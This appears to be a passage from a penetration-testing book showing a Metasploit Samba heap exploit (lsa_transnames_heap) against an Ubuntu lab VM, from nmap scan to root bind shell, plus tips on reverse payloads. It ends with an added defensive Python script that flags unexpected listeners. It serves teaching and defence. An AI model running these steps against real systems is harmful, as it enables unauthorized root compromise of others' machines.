Exploiting an Ubuntu Machine

Let’s try a different exploit on an Ubuntu 9.04 virtual machine. The steps are pretty much the same as for the preceding exploit except that we will select a different payload.

msf > nmap -sT -A -P0 192.168.33.132
[*] exec: nmap -sT -A -P0 192.168.33.132

Starting Nmap 5.20 ( http://nmap.org ) at 2011-03-15 19:35 EDT
Warning: Traceroute does not support idle or connect scan, disabling...
Nmap scan report for 192.168.33.132
Host is up (0.00048s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE     VERSION
80/tcp  open  http        Apache httpd 2.2.3 ((Ubuntu) PHP/5.2.1) 
|_html-title: Index of /
139/tcp open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME) 
445/tcp open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
MAC Address: 00:0C:29:21:AD:08 (VMware)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).

. . . SNIP . . .

Host script results:
|_nbstat: NetBIOS name: UBUNTU, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-os-discovery:
|   OS: Unix (Samba 3.0.24)
|   Name: MSHOMEUnknown
|_  System time: 2011-03-15 17:39:57 UTC-4

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.11 seconds

We see three open ports: 80, 139, and 445. The NetBIOS name and the Samba banner tell us that the system is running Ubuntu, and the service detection shows that it is running a version of Samba 3.x and Apache 2.2.3 with PHP 5.2.1.

Let’s search for a Samba exploit and try it against the system:

msf > search samba
[*] Searching loaded modules for pattern 'samba'...

Auxiliary
=========
   Name                               Rank    Description
   ----                               ----    -----------
   admin/smb/samba_symlink_traversal  normal  Samba Symlink Directory Traversal
   dos/samba/lsa_addprivs_heap        normal  Samba lsa_io_privilege_set Heap Overflow
   dos/samba/lsa_transnames_heap      normal  Samba lsa_io_trans_names Heap Overflow

Exploits
========

   Name                                 Rank       Description
   ----                                 ----       -----------
   linux/samba/lsa_transnames_heap      good       Samba lsa_io_trans_names . . .

. . . SNIP . . .

msf > use linux/samba/lsa_transnames_heap
msf exploit(lsa_transnames_heap) > show payloads
Compatible Payloads
===================

   Name                              Rank    Description
   ----                              ----    -----------
   generic/debug_trap                normal  Generic x86 Debug Trap
   generic/shell_bind_tcp            normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp         normal  Generic Command Shell, Reverse TCP Inline
   linux/x86/adduser                 normal  Linux Add User
   linux/x86/chmod                   normal  Linux Chmod
   linux/x86/exec                    normal  Linux Execute Command
   linux/x86/metsvc_bind_tcp         normal  Linux Meterpreter Service, Bind TCP
   linux/x86/metsvc_reverse_tcp      normal  Linux Meterpreter Service, Reverse TCP Inline
   linux/x86/shell/bind_ipv6_tcp     normal  Linux Command Shell, Bind TCP Stager (IPv6)
   linux/x86/shell/bind_tcp          normal  Linux Command Shell, Bind TCP Stager

. . . SNIP . . .

msf exploit(lsa_transnames_heap) > set payload linux/x86/shell_bind_tcp
payload => linux/x86/shell_bind_tcp
msf exploit(lsa_transnames_heap) > set LPORT 8080
LPORT => 8080
msf exploit(lsa_transnames_heap) > set RHOST 192.168.33.132
RHOST => 192.168.33.132
msf exploit(lsa_transnames_heap) > exploit

[*] Creating nop sled....
[*] Started bind handler
[*] Trying to exploit Samba with address 0xffffe410...
[*] Connecting to the SMB service...

. . . SNIP . . .

[*] Calling the vulnerable function...
[+] Server did not respond, this is expected
[*] Command shell session 1 opened (192.168.33.129:41551 -> 192.168.33.132:8080)
ifconfig
eth1      Link encap:Ethernet  HWaddr 00:0C:29:21:AD:08
          inet addr:192.168.33.132  Bcast:192.168.33.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:3178 errors:0 dropped:0 overruns:0 frame:0
          TX packets:2756 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:292351 (285.4 KiB)  TX bytes:214234 (209.2 KiB)
          Interrupt:17 Base address:0x2000

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)

whoami
root

This type of exploit, called a heap-based attack, takes advantage of how the program manages dynamically allocated memory, but it isn’t 100 percent reliable. (You may need to run the exploit command a few times if it doesn’t work the first time.)

Notice in this example that we used a bind shell, which opens a listener port (here, 8080) on the target machine; Metasploit then connects to that port automatically for us. (Remember to use a reverse payload when attacking through a firewall or NAT, because the target must be able to reach you rather than the other way around.)
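From the defender's side, the bind shell above leaves a telltale artifact: a Samba process listening on a port it has no business using. The following script is an added example, not part of the book or of Metasploit; it assumes constructed `ss -ltnp` output and a hypothetical per-service port baseline, and flags any listener that falls outside that baseline.

```python
import re
from typing import NamedTuple

# Hypothetical baseline: which ports each daemon is allowed to listen on.
# Samba should only ever own the SMB ports seen in the nmap scan (139, 445).
EXPECTED_LISTENERS = {
    "smbd": {139, 445},
    "apache2": {80},
}

class Listener(NamedTuple):
    proto: str
    addr: str
    port: int
    process: str

# Constructed sample in the shape of `ss -ltnp` output on a Linux host.
# The last line is what a bind-shell payload looks like while it is still
# running inside the exploited smbd child process (before a shell is spawned).
SAMPLE_SS_OUTPUT = """\
State   Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN  0      128          0.0.0.0:80       0.0.0.0:*     users:(("apache2",pid=1012,fd=4))
LISTEN  0      50           0.0.0.0:139      0.0.0.0:*     users:(("smbd",pid=1203,fd=21))
LISTEN  0      50           0.0.0.0:445      0.0.0.0:*     users:(("smbd",pid=1203,fd=20))
LISTEN  0      1            0.0.0.0:8080     0.0.0.0:*     users:(("smbd",pid=1377,fd=25))
"""

LINE_RE = re.compile(
    r'^LISTEN\s+\d+\s+\d+\s+(?P<addr>\S+):(?P<port>\d+)\s+\S+\s+users:\(\("(?P<proc>[^"]+)"'
)

def parse_ss(output: str) -> list[Listener]:
    """Extract (addr, port, process) from every LISTEN line; non-matching lines are skipped."""
    listeners = []
    for line in output.splitlines():
        m = LINE_RE.match(line)
        if m:
            listeners.append(Listener("tcp", m["addr"], int(m["port"]), m["proc"]))
    return listeners

def unexpected_listeners(listeners: list[Listener]) -> list[Listener]:
    """Return listeners owned by a baselined daemon but bound to a port outside its baseline."""
    return [
        l for l in listeners
        if l.process in EXPECTED_LISTENERS and l.port not in EXPECTED_LISTENERS[l.process]
    ]

if __name__ == "__main__":
    for l in unexpected_listeners(parse_ss(SAMPLE_SS_OUTPUT)):
        print(f"ALERT: {l.process} (tcp) listening on {l.addr}:{l.port} outside its baseline")
```

Run periodically against live `ss -ltnp` output, this catches the bind-shell case; a reverse payload would instead show up as an unexpected outbound connection from smbd, which the same baseline idea applies to on the established-connection side.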
